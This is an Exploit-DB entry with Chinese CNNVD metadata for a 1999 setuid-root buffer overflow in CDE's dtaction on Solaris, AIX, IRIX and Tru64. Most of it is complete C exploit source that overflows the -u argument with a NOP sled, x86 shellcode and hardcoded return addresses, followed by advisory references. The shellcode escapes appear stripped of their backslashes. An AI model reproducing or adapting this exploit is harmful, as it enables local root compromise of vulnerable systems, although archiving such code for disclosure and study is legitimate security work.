https://www.exploit-db.com/exploits/19497
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-022

CDEdtaction实用程序的AddSuLog函数存在缓冲区溢出漏洞。本地用户可以借助一个长用户名获得根权限。

/*
source: http://www.securityfocus.com/bid/635/info

TRU64/DIGITAL UNIX 4.0 d/e/f,AIX <= 4.3.2,Common Desktop Environment <= 2.1,IRIX <= 6.5.14,Solaris <= 7.0 dtaction Userflag Buffer Overflow Vulnerability  

CDE is the Common Desktop Environment, an implementation of a Desktop Manager for systems that run X. It is distributed with various commercial UNIX implementations.

Under some distributions of CDE Common Desktop Environment, the dtaction program has a locally exploitable buffer overflow condition. The buffer overflow condition exists in the argument parsing code for the -u (user) function. Any information provided by the user over 1024 bytes may overwrite the buffer and in return be exploited by a malicious user.

Since the dtaction program is typically installed setuid root, this make it possible for a local user to gain administrative access on a vulnerable system.
*/


/*
* dtaction_ov.c
* Job de Haas
* (c) ITSX bv 1999
*
* This program demonstrates an overflow problem in /usr/dt/bin/dtaction.
* It has only been tested on Solaris 7 x86
* assembly code has been taken from ex_dtprintinfo86.c by [email protected]
*
*/

#include <stdio.h>

#include <stdlib.h>
#include <string.h>
#include <pwd.h>

#define BUFLEN 998

char exploit_code[] =
"xebx18x5ex33xc0x33xdbxb3x08x2bxf3x88x06x50x50xb0"
"x8dx9axffxffxffxffx07xeexebx05xe8xe3xffxffxff"
"xebx18x5ex33xc0x33xdbxb3x08x2bxf3x88x06x50x50xb0"
"x17x9axffxffxffxffx07xeexebx05xe8xe3xffxffxff"
"x55x8bxecx83xecx08xebx50x33xc0xb0x3bxebx16xc3x33"
"xc0x40xebx10xc3x5ex33xdbx89x5ex01xc6x46x05x07x88"
"x7ex06xebx05xe8xecxffxffxffx9axffxffxffxffx0fx0f"
"xc3x5ex33xc0x89x76x08x88x46x07x89x46x0cx50x8dx46"
"x08x50x8bx46x08x50xe8xbdxffxffxffx83xc4x0cx6ax01"
"xe8xbaxffxffxffx83xc4x04xe8xd4xffxffxff/bin/id";

main()
{
char *argp[6], *envp[3];
char buf[2048];
unsigned long *p;
struct passwd *pw;
int buflen;

if ((pw = getpwuid(getuid())) == NULL) {
perror("getpwuid");
exit(1);
}

buflen = BUFLEN - strlen( pw->pw_name );

memset(buf,0x90,buflen);

strncpy( &buf[500], exploit_code, strlen(exploit_code));

/* set some pointers to values that keep code running */
p = (unsigned long *)&buf[buflen];
*p++ = 0x37dc779b;
*p++ = 0xdfaf6502;
*p++ = 0x08051230;
*p++ = 0x080479b8;

/* the return address. */
*p++ = 0x08047710;
*p = 0;

argp[0] = strdup("/usr/dt/bin/dtaction");
argp[1] = strdup("-u");
argp[2] = strdup(buf);
argp[3] = strdup("Run");
argp[4] = strdup("/usr/bin/id");
argp[5] = NULL;

if (!getenv("DISPLAY")) {
printf("forgot to set DISPLAYn");
exit(1);
}

envp[0] = malloc( strlen("DISPLAY=")+strlen(getenv("DISPLAY"))+1);
strcpy(envp[0],"DISPLAY=");
strcat(envp[0],getenv("DISPLAY"));
envp[1] = NULL;

execve("/usr/dt/bin/dtaction",argp,envp);

}

来源:HP
名称:HPSBUX9909-103
链接:http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9909-103
来源:BID
名称:635
链接:http://www.securityfocus.com/bid/635
来源:SUN
名称:00192
链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc;=secbull/192
来源:USGovernmentResource:oval:org.mitre.oval:def:3078
名称:oval:org.mitre.oval:def:3078
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:3078